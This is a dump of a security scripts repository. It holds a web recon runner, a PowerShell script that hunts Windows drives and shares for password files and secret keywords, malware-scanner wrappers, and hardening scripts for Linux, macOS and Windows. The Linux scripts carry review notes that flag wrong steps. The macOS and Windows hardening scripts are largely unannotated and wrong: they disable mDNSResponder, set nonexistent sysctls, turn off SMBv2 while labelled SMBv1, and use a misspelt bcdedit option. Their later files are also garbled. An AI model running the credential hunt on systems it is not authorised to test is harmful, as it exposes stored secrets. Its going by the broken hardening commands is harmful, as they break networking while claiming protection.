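# Check for secrets in Git repository
echo "Checking for secrets in Git repository..."
GitTools -u "$url" >> "$output_file"
gitallsecrets -u "$url" >> "$output_file"

# Check for race condition vulnerabilities
echo "Checking for race condition vulnerabilities..."
RaceTheWeb -u "$url" >> "$output_file"

# Check for CORS misconfigurations
echo "Checking for CORS misconfigurations..."
CORStest -u "$url" >> "$output_file"

# Take screenshots
echo "Taking screenshots..."
EyeWitness -u "$url" >> "$output_file"

# Check for parameter tampering vulnerabilities
echo "Checking for parameter tampering vulnerabilities..."
parameth -u "$url" >> "$output_file"

echo "Recon complete!"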
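# -------------------------------------------------------------------------------- /scripts/recon/windows_cred_hunter.ps1: --------------------------------------------------------------------------------
# windows_cred_hunter.ps1 -- walk a fixed list of directories and report files
# whose name, extension or contents suggest stored credentials. Findings go to
# the console only (Write-Host); nothing is written to disk.
#
# NOTE(review):
#  - "C:\" already contains every other local path in $searchDirs, so those
#    directories are walked (and every file read) more than once; trim the
#    list if runtime matters.
#  - "\\" is not a usable path for Get-ChildItem; replace it with concrete
#    UNC shares.
#  - Keywords are regular expressions; "key" and "token" match very broadly,
#    so expect noise under C:\Windows and Program Files.
#  - Get-Content reads each file fully into memory, and .docx/.xlsx are
#    zipped containers, so the keyword pass sees compressed bytes, not text.

# Define the directories to search
$searchDirs = @(
    "C:\",                          # Root of C: drive
    "\\",                           # Network shares (you might need to specify more specific network paths)
    "$env:USERPROFILE\Documents",   # User Documents
    "$env:USERPROFILE\Desktop",     # User Desktop
    "$env:USERPROFILE\AppData",     # User AppData
    "$env:ALLUSERSPROFILE",         # All Users Profile
    "C:\Windows",                   # Windows directory
    "C:\Program Files",             # Program Files
    "C:\Program Files (x86)",       # Program Files (x86)
    "C:\inetpub\wwwroot",           # Default IIS web root
    "C:\Scripts",                   # Custom Scripts directory
    "C:\Shares",                    # Custom Shares directory
    "$env:PUBLIC",                  # Public directory
    "C:\SharePoint"                 # SharePoint directory (if applicable)
)

# Define the specific files to search for
$specificFiles = @(
    "unattend.xml",
    "web.config",
    "pass.txt",
    "passwords.docx",
    "passwords.xlsx"
)

# Define the keywords to search for in files
$keywords = @(
    "password",
    "passwd",
    "credentials",
    "secret",
    "key",
    "token",
    "KeePass"
)

# Define the specific file patterns to search for
$filePatterns = @(
    "*.txt",
    "*.docx",
    "*.xlsx",
    "*.xml",
    "*.config",
    "*.ps1",
    "*.bat",
    "*.sh"
)

# Function to search for specific files
# Prints the full path of every file in $directories (recursively) whose name
# matches one of $files. Access errors are suppressed, not reported.
function Search-SpecificFiles {
    param (
        [string[]]$directories,
        [string[]]$files
    )
    foreach ($dir in $directories) {
        foreach ($file in $files) {
            Get-ChildItem -Path $dir -Filter $file -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
                Write-Host "Found file: $($_.FullName)"
            }
        }
    }
}

# Function to search for specific keywords in files
# Reads every file under $directories once per directory entry and reports
# each keyword that matches at least one line.
function Search-Keywords {
    param (
        [string[]]$directories,
        [string[]]$keywords
    )
    foreach ($dir in $directories) {
        Get-ChildItem -Path $dir -Recurse -File -ErrorAction SilentlyContinue | ForEach-Object {
            $fileContent = Get-Content -Path $_.FullName -ErrorAction SilentlyContinue
            foreach ($keyword in $keywords) {
                # $fileContent is an array of lines; -match on an array yields
                # the matching lines, so the condition is true if any line hits.
                if ($fileContent -match $keyword) {
                    Write-Host "Found keyword '$keyword' in file: $($_.FullName)"
                }
            }
        }
    }
}

# Function to search for specific file patterns
# Same walk as Search-SpecificFiles, but with wildcard patterns.
function Search-FilePatterns {
    param (
        [string[]]$directories,
        [string[]]$patterns
    )
    foreach ($dir in $directories) {
        foreach ($pattern in $patterns) {
            Get-ChildItem -Path $dir -Filter $pattern -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
                Write-Host "Found file: $($_.FullName)"
            }
        }
    }
}

# Execute the search functions
Search-SpecificFiles -directories $searchDirs -files $specificFiles
Search-Keywords -directories $searchDirs -keywords $keywords
Search-FilePatterns -directories $searchDirs -patterns $filePatterns
# -------------------------------------------------------------------------------- /scripts/security/detection/linux_mal_scanner.sh: --------------------------------------------------------------------------------
#!/bin/bash
# linux_mal_scanner.sh -- install (if missing) and run rkhunter, clamav, lynis
# and chkrootkit. Must run as root; Debian/Ubuntu only (apt).

# Check if root
if [ "$(id -u)" -ne 0 ]; then
    echo "Script must be run as root"
    exit 1
fi

# Map each package to the executable it installs. The original tested
# `command -v "$package"` with the *package* name, and clamav ships no binary
# called "clamav" (its scanner is clamscan), so that package was reinstalled
# on every run.
binary_for() {
    case "$1" in
        clamav) echo "clamscan" ;;
        *)      echo "$1" ;;
    esac
}

# Install required packages if not already installed
required_packages=(rkhunter clamav lynis chkrootkit)
for package in "${required_packages[@]}"; do
    if ! command -v "$(binary_for "$package")" &> /dev/null; then
        echo "$package not found, installing..."
        # sudo is redundant after the root check above but harmless.
        sudo apt install -y "$package"
    else
        echo "$package already installed"
    fi
done

# Run system scans and save output to a file
# NOTE(review): despite the comment, nothing is saved -- all output goes to the
# terminal. Pipe the run through `tee scan.log` if a record is wanted.
echo "Running system scans..."
sudo rkhunter --update
sudo rkhunter --check
# clamscan -r / prints a line for every file scanned; add -i to list only infected files.
sudo clamscan -r /
sudo lynis audit system
sudo chkrootkit

echo "System scans completed."
# -------------------------------------------------------------------------------- /scripts/security/detection/macos_malscan.sh: --------------------------------------------------------------------------------
#!/bin/bash
# macos_malscan.sh -- install the scanners with Homebrew and run them.

# Check if Homebrew is installed
if ! command -v brew >/dev/null 2>&1; then
    echo "Homebrew is not installed. Please install Homebrew to proceed."
    exit 1
fi

# Install necessary tools using Homebrew
echo "Installing necessary tools using Homebrew..."
brew install rkhunter clamav lynis chkrootkit pip-audit

# pip-audit --fix is not a scan: it upgrades vulnerable Python packages in the
# current environment. In the original it ran under the "Running rkhunter..."
# banner, which hid that.
echo "Running pip-audit --fix (upgrades vulnerable Python packages)..."
pip-audit --fix

# Run system scans with sudo
echo "Running rkhunter..."
sudo rkhunter --config-check
sudo rkhunter --check --vl
echo "Running clamav scan..."
# Without sudo clamscan cannot read other users' homes or most system paths;
# expect "Permission denied" lines. Homebrew's clamav typically also needs a
# freshclam.conf and a freshclam run before a signature database exists.
clamscan -r /
echo "Running lynis system audit as sudo..."
sudo lynis audit system
echo "Checking for rootkits with chkrootkit..."
sudo chkrootkit

echo "System scans completed."
# -------------------------------------------------------------------------------- /scripts/security/hardening/LinuxSecure.sh: --------------------------------------------------------------------------------
#!/bin/bash

# LinuxSecure.sh - A script to harden the security of a Linux system
# by disabling unnecessary services and protocols, enabling security features,
# and asking the user for confirmation before making any changes.

echo "Disable SMBv1?"
read -p "(Y/N) " input
if [[ $input =~ ^[Yy]$ ]]; then
    # NOTE(review): this purges the Samba client utilities rather than
    # disabling the SMBv1 dialect. On a Samba server SMBv1 is turned off with
    # `server min protocol = SMB2` in smb.conf; for CIFS mounts the dialect
    # is chosen with the vers= mount option.
    sudo apt-get remove --purge samba-common-bin
    sudo apt-get autoremove
fi

echo "Disable Remote Registry Service?"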
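read -p "(Y/N) " input
if [[ $input =~ ^[Yy]$ ]]; then
    # NOTE(review): "Remote Registry" is a Windows service; this step stops and
    # disables rpcbind (the ONC RPC portmapper, needed by NFS). update-rc.d only
    # affects SysV init; on systemd hosts use `systemctl disable --now rpcbind`.
    sudo service rpcbind stop
    sudo update-rc.d rpcbind disable
fi

echo "Disable LLMNR?"
read -p "(Y/N) " input
if [[ $input =~ ^[Yy]$ ]]; then
    # NOTE(review): this does not touch LLMNR -- it disables IPv6 system-wide,
    # which can break connectivity. On systemd-resolved hosts LLMNR is disabled
    # with `LLMNR=no` in /etc/systemd/resolved.conf. (The leading sudo on echo
    # is pointless; tee does the privileged write.)
    sudo echo "net.ipv6.conf.all.disable_ipv6 = 1" | sudo tee -a /etc/sysctl.conf
    sudo sysctl -p
fi

echo "Disable NetBIOS over TCP/IP?"
read -p "(Y/N) " input
if [[ $input =~ ^[Yy]$ ]]; then
    # NOTE(review): only udp/137 (name service) is relevant here; the datagram
    # (udp/138) and session (tcp/139) ports are not covered. If Samba runs on
    # this host, `disable netbios = yes` and `smb ports = 445` in smb.conf turn
    # the listeners off instead of filtering them.
    sudo apt-get install iptables-persistent
    sudo iptables -A INPUT -p tcp --dport 137 -j DROP
    sudo iptables -A INPUT -p udp --dport 137 -j DROP
    sudo netfilter-persistent save
fi

echo "Enable Control Flow Guard (CFG)?"
read -p "(Y/N) " input
if [[ $input =~ ^[Yy]$ ]]; then
    # NOTE(review): CFG is a Windows compiler/loader feature. execstack only
    # clears the executable-stack flag of one ELF binary, and
    # /usr/bin/program_name is a placeholder that does not exist. Left as-is
    # because no single command expresses the intent.
    sudo apt-get install execstack
    sudo execstack -c /usr/bin/program_name
fi

echo "Done!"
# -------------------------------------------------------------------------------- /scripts/security/hardening/LinuxServerSecure.sh: --------------------------------------------------------------------------------
#!/bin/bash
# Interactive Debian/Ubuntu server hardening: every step asks before acting.
# Run as root (adduser, ufw, sed on sshd_config, apt-get and crontab need it).

# Create a sudo user
read -p "Create a new sudo user (Allows for administrative actions with accountability)? (y/n): " create_user
if [ "$create_user" == "y" ]; then
    read -p "Enter the username for the new sudo user: " username
    adduser "$username"
    usermod -aG sudo "$username"
fi

# Use Secure Shell Protocol
read -p "Secure the Secure Shell Protocol (Enhances SSH security by disabling password authentication)? (y/n): " use_ssh
if [ "$use_ssh" == "y" ]; then
    # Matches both the commented default and an explicit "yes"; the original
    # pattern only rewrote the commented form, so an existing
    # "PasswordAuthentication yes" stayed in force. Make sure a working
    # authorized_keys exists for the account you log in with before this runs.
    sed -i -E 's/^#?PasswordAuthentication[[:space:]]+yes/PasswordAuthentication no/' /etc/ssh/sshd_config
    # Validate the config before restarting so a bad edit cannot take sshd down.
    if sshd -t; then
        systemctl restart sshd
    else
        echo "sshd -t rejected /etc/ssh/sshd_config; not restarting sshd."
    fi
fi

# Setup a basic firewall (UFW)
read -p "Setup a basic firewall (UFW) (Add rules in next step)? (y/n): " setup_ufw
if [ "$setup_ufw" == "y" ]; then
    ufw default deny incoming
    ufw default allow outgoing
    # Asked regardless of the SSH step above: the original only offered this
    # when use_ssh was "y", so answering "n" there and enabling ufw over an
    # SSH session locked that session out.
    read -p "Do you want to allow SSH (port 22) by default (Allows SSH connections)? (y/n): " allow_ssh
    if [ "$allow_ssh" == "y" ]; then
        ufw allow 22/tcp
    fi
    read -p "Enter any additional ports to open (comma-separated): " ports
    IFS=',' read -ra ADDR <<< "$ports"
    for port in "${ADDR[@]}"; do
        # Skip blanks (empty input, trailing comma) that would make ufw error out.
        [ -n "$port" ] && ufw allow "$port"
    done
    ufw enable
    ufw reload
fi

# Disable unwanted Linux services
read -p "Disable vulnerable Linux services (Reduces attack surface by disabling rpcbind NFS and SMB)? (y/n): " disable_services
if [ "$disable_services" == "y" ]; then
    # NOTE(review): `disable` only stops these from starting at boot; running
    # instances keep running until `systemctl stop` (or `disable --now`).
    # Unit names differ by distribution (nfs-server, smbd/nmbd), so expect
    # "Unit ... does not exist" for some of these.
    systemctl disable rpcbind
    systemctl disable nfs
    systemctl disable smb
    echo "Disabled rpcbind, NFS, and SMB services."
fi

# Disable ICMP
read -p "Disable ICMP (Prevents attackers from using the ping command against the server)? (y/n): " disable_icmp
if [ "$disable_icmp" == "y" ]; then
    # Only echo requests are ignored (other ICMP, e.g. PMTU discovery, still
    # works). Monitoring that relies on ping will report the host as down.
    echo "net.ipv4.icmp_echo_ignore_all = 1" >> /etc/sysctl.conf
    sysctl -p
fi

# Enable SELinux
read -p "Enable SELinux (Enhances security through mandatory access controls)? (y/n): " enable_selinux
if [ "$enable_selinux" == "y" ]; then
    # Debian/Ubuntu ship AppArmor, not SELinux; without the SELinux packages
    # and a relabel, setenforce is missing or fails. setenforce is also not
    # persistent across reboots (/etc/selinux/config is).
    if command -v setenforce >/dev/null 2>&1; then
        setenforce 1
    else
        echo "setenforce not found; SELinux is not installed on this system."
    fi
fi

# Install and configure fail2ban
read -p "Install and configure fail2ban (Protects against brute-force attacks)? (y/n): " install_fail2ban
if [ "$install_fail2ban" == "y" ]; then
    apt-get install fail2ban
    # jail.local is where local overrides belong; copying the whole jail.conf
    # works but shadows every later package update to jail.conf.
    cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local
fi

# Keep Kernel and Packages Updated
read -p "Keep Kernel and Packages Updated (Ensures system components are up to date with security patches)? (y/n): " update_kernel
if [ "$update_kernel" == "y" ]; then
    apt-get update && apt-get upgrade -y
fi

# Disable USB and Thunderbolt Devices
read -p "Disable USB and Thunderbolt Devices (Prevents unauthorized access through physical devices)? (y/n): " disable_usb
if [ "$disable_usb" == "y" ]; then
    # blacklist only prevents automatic loading: a module that is already
    # loaded stays until reboot, and an explicit modprobe still works
    # ("install usb-storage /bin/false" blocks that too).
    echo "blacklist usb-storage" >> /etc/modprobe.d/blacklist.conf
    echo "blacklist thunderbolt" >> /etc/modprobe.d/blacklist.conf
fi

# Enforce strong password policies
read -p "Enforce strong password policies (Increases password complexity to reduce the risk of unauthorized access)? (y/n): " enforce_passwords
if [ "$enforce_passwords" == "y" ]; then
    # NOTE(review): appending puts this line *after* pam_unix in the stack and
    # it needs libpam-pwquality installed; on Debian common-password is managed
    # by pam-auth-update, which may rewrite the file. Running the step twice
    # appends the line twice.
    echo "password requisite pam_pwquality.so retry=3 minlen=10 difok=3" >> /etc/pam.d/common-password
fi

# Restrict use of previous passwords
read -p "Restrict use of previous passwords (Prevents reuse of old passwords, reducing risk of compromised credentials)? (y/n): " restrict_passwords
if [ "$restrict_passwords" == "y" ]; then
    # NOTE(review): same caveats as above; common-password normally already
    # has a pam_unix line, which should get remember=5 added to it rather than
    # a second pam_unix entry appended at the end.
    echo "password required pam_unix.so remember=5" >> /etc/pam.d/common-password
fi

# Purge Unnecessary Packages
read -p "Purge Unnecessary Packages (Removes unnecessary software to minimize potential vulnerabilities)? (y/n): " purge_packages
if [ "$purge_packages" == "y" ]; then
    apt-get autoremove -y
fi

# Set up password aging
read -p "Set up password aging (Requires password changes at regular intervals to reduce risk of unauthorized access)? (y/n): " set_password_aging
if [ "$set_password_aging" == "y" ]; then
    # $username is only set when a user was created above; the original then
    # ran `chage -M 60 ""`, which fails.
    if [ -z "$username" ]; then
        read -p "Enter the username to apply password aging to: " username
    fi
    chage -M 60 "$username"
fi

# Disable unwanted SUID and SGID binaries
read -p "Review and optionally remove SUID and SGID binaries (Identify and modify special permissions)? (y/n): " review_suid_sgid
if [ "$review_suid_sgid" == "y" ]; then
    echo "Listing all SUID/SGID files:"
    files=$(find / -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null)
    # NOTE(review): stripping the bit from a system binary (sudo, passwd, su,
    # mount, ...) breaks it for unprivileged users -- review before removing.
    # $files is intentionally unquoted so select splits it into one entry per path.
    select file in $files; do
        # The original's only exit was Ctrl+C, which also killed the remaining
        # steps of this script; "q" now leaves the menu and continues.
        if [ "$REPLY" == "q" ]; then
            break
        fi
        if [ -n "$file" ]; then
            read -p "Remove SUID/SGID permissions from $file? (y/n): " remove_suid_sgid
            if [ "$remove_suid_sgid" == "y" ]; then
                chmod a-s "$file"
                echo "Removed SUID/SGID permissions from $file."
            fi
        else
            echo "Invalid selection."
        fi
        echo "Select another file, or enter 'q' to continue with the remaining steps."
    done
fi


# Logging and auditing
read -p "Logging and auditing (Increases monitoring and accountability through detailed logs)? (y/n): " logging_auditing
if [ "$logging_auditing" == "y" ]; then
    # auditd with no rules loaded records little beyond its own start; add
    # rules under /etc/audit/rules.d/ for the events you want.
    apt-get install auditd
fi

# Perform regular backups (manual setup required)
read -p "Perform regular backups (Ensures data integrity and availability through regular backups)? (y/n): " perform_backups
if [ "$perform_backups" == "y" ]; then
    read -p "Enter the path to the backup script (e.g., /path/to/backup/script.sh): " backup_script
    if [ -f "$backup_script" ]; then
        read -p "How often do you want to run the backups? (daily/weekly/monthly): " backup_frequency
        case $backup_frequency in
            daily)
                cron_time="0 0 * * *"
                ;;
            weekly)
                cron_time="0 0 * * 0"
                ;;
            monthly)
                cron_time="0 0 1 * *"
                ;;
            *)
                echo "Invalid selection. Please manually set up the backup schedule using crontab."
                exit 1
                ;;
        esac
        echo "Setting up $backup_frequency backups using $backup_script."
        # `crontab -l` prints "no crontab for root" on stderr and exits 1 when
        # none exists yet; the message is silenced so it is not read as an error.
        (crontab -l 2>/dev/null; echo "$cron_time $backup_script") | crontab -
    else
        echo "Backup script not found. Please ensure the path is correct."
    fi
fi


# Monitor listening network ports
read -p "Monitor listening network ports (Helps in identifying potentially malicious or unnecessary open ports)? (y/n): " monitor_ports
if [ "$monitor_ports" == "y" ]; then
    read -p "How often do you want to check the listening ports? (daily/weekly/monthly): " check_frequency
    case $check_frequency in
        daily)
            cron_time_ports="0 0 * * *"
            ;;
        weekly)
            cron_time_ports="0 0 * * 0"
            ;;
        monthly)
            cron_time_ports="0 0 1 * *"
            ;;
        *)
            echo "Invalid selection. Please manually set up the monitoring schedule using crontab."
            exit 1
            ;;
    esac
    # The original wrote to /path/to/log/directory/, a placeholder that does
    # not exist, so the cron job failed on every run.
    read -p "Log file for the listening-port snapshots [/var/log/listening_ports.log]: " ports_log
    ports_log=${ports_log:-/var/log/listening_ports.log}
    # NOTE(review): each run overwrites the previous snapshot (single `>`), so
    # there is no history to diff against; append with a timestamp if you want
    # to spot new ports over time. netstat needs net-tools (`ss -tuln` is the
    # iproute2 equivalent).
    monitoring_command="netstat -tuln > $ports_log"
    echo "Setting up $check_frequency port monitoring."
    (crontab -l 2>/dev/null; echo "$cron_time_ports $monitoring_command") | crontab -
fi

echo "Server hardening completed!"
# -------------------------------------------------------------------------------- /scripts/security/hardening/MacSecure.sh: --------------------------------------------------------------------------------
#!/bin/bash

# MacSecure.sh - A script to harden the security of a MacOS system
# by disabling unnecessary services and protocols, enabling security features,
# and asking the user for confirmation before making any changes.
#
# NOTE(review): on macOS releases with System Integrity Protection,
# `launchctl unload -w` on /System/Library/LaunchDaemons may be refused; the
# supported switches are System Settings > Sharing and
# `sudo launchctl disable system/LABEL`. The prompts below also do not match
# what the commands do (see the per-step notes).

echo "Disable SMBv1?"
read -p "(Y/N) " input
if [[ $input =~ ^[Yy]$ ]]; then
    # This unloads smbd entirely (all File Sharing over SMB), not just SMBv1.
    sudo launchctl unload -w /System/Library/LaunchDaemons/com.apple.smbd.plist
fi

echo "Disable Remote Registry Service?"
read -p "(Y/N) " input
if [[ $input =~ ^[Yy]$ ]]; then
    # "Remote Registry" is a Windows service; this unloads Apple Remote
    # Management (the ARD agent), which may be what was meant.
    sudo launchctl unload -w /System/Library/LaunchDaemons/com.apple.RemoteManagement.plist
fi

echo "Disable LLMNR?"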
20 | read -p "(Y/N) " input 21 | if [[ $input =~ ^[Yy]$ ]]; then 22 | sudo launchctl unload -w /System/Library/LaunchDaemons/com.apple.mDNSResponder.plist 23 | fi 24 | 25 | echo "Disable NetBIOS over TCP/IP?" 26 | read -p "(Y/N) " input 27 | if [[ $input =~ ^[Yy]$ ]]; then 28 | sudo sysctl -w net.inet.tcp.msl=1000 29 | sudo sysctl -w net.inet.udp.maxdgram=576 30 | fi 31 | 32 | echo "Enable Control Flow Guard (CFG)?" 33 | read -p "(Y/N) " input 34 | if [[ $input =~ ^[Yy]$ ]]; then 35 | sudo sysctl -w kern.cfg=1 36 | fi 37 | 38 | echo "Done!" 39 | 40 | -------------------------------------------------------------------------------- /scripts/security/hardening/WinSecure.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | 3 | :SMBv1 4 | echo Disable SMBv1? (Y/N) 5 | set /p input= 6 | if /i {%input%}=={Y} ( 7 | sc.exe config lanmanworkstation depend= bowser/mrxsmb10/nsi 8 | sc.exe config mrxsmb20 start= disabled 9 | ) 10 | 11 | :RemoteRegistry 12 | echo Disable Remote Registry Service? (Y/N) 13 | set /p input= 14 | if /i {%input%}=={Y} ( 15 | sc.exe config remoteregistry start= disabled 16 | ) 17 | 18 | :LLMNR 19 | echo Disable LLMNR? (Y/N) 20 | set /p input= 21 | if /i {%input%}=={Y} ( 22 | reg add "HKLM\System\CurrentControlSet\Services\LLMNR" /v "Start" /t REG_DWORD /d 0 /f 23 | ) 24 | 25 | :NetBIOS 26 | echo Disable NetBIOS over TCP/IP? (Y/N) 27 | set /p input= 28 | if /i {%input%}=={Y} ( 29 | netsh int ip set global taskoffload=disabled 30 | ) 31 | 32 | :CFG 33 | echo Enable Control Flow Guard (CFG)? (Y/N) 34 | set /p input= 35 | if /i {%input%}=={Y} ( 36 | bcdedit /set {current} nx MasOptin 37 | ) 38 | 39 | echo Done! 
40 | pause 41 | -------------------------------------------------------------------------------- /scripts/utilities/CleanDir.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | #Deletes empty files in specified directory 3 | import os 4 | import sys 5 | 6 | def delete_zero_size_files(directory): 7 | for filename in os.listdir(directory): 8 | file_path = os.path.join(directory, filename) 9 | if os.path.isfile(file_path) and os.path.getsize(file_path) == 0: 10 | os.remove(file_path) 11 | print(f'Deleted zero-size file: {file_path}') 12 | 13 | def main(directory): 14 | delete_zero_size_files(directory) 15 | 16 | if __name__ == '__main__': 17 | if len(sys.argv) != 2: 18 | print("Usage: CleanDir.py ") 19 | else: 20 | main(sys.argv[1]) 21 | -------------------------------------------------------------------------------- /scripts/utilities/DomainExtractor.py: -------------------------------------------------------------------------------- 1 | import re 2 | import sys 3 | 4 | def extract_domains(filename): 5 | with open(filename, 'r') as f: 6 | text = f.read() 7 | domain_regex = r'(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z0-9][a-z0-9-]{0,61}[a-z0-9]' 8 | domains = re.findall(domain_regex, text) 9 | unique_domains = list(set(domains)) 10 | return unique_domains 11 | 12 | def write_domains(filename, domains): 13 | with open(filename, 'w') as f: 14 | for domain in domains: 15 | f.write(domain + '\n') 16 | 17 | def main(input_filename, output_filename): 18 | domains = extract_domains(input_filename) 19 | write_domains(output_filename, domains) 20 | 21 | if __name__ == '__main__': 22 | if len(sys.argv) != 3: 23 | print("Usage: python DomainExtractor.py ") 24 | else: 25 | main(sys.argv[1], sys.argv[2]) 26 | --------------------------------------------------------------------------------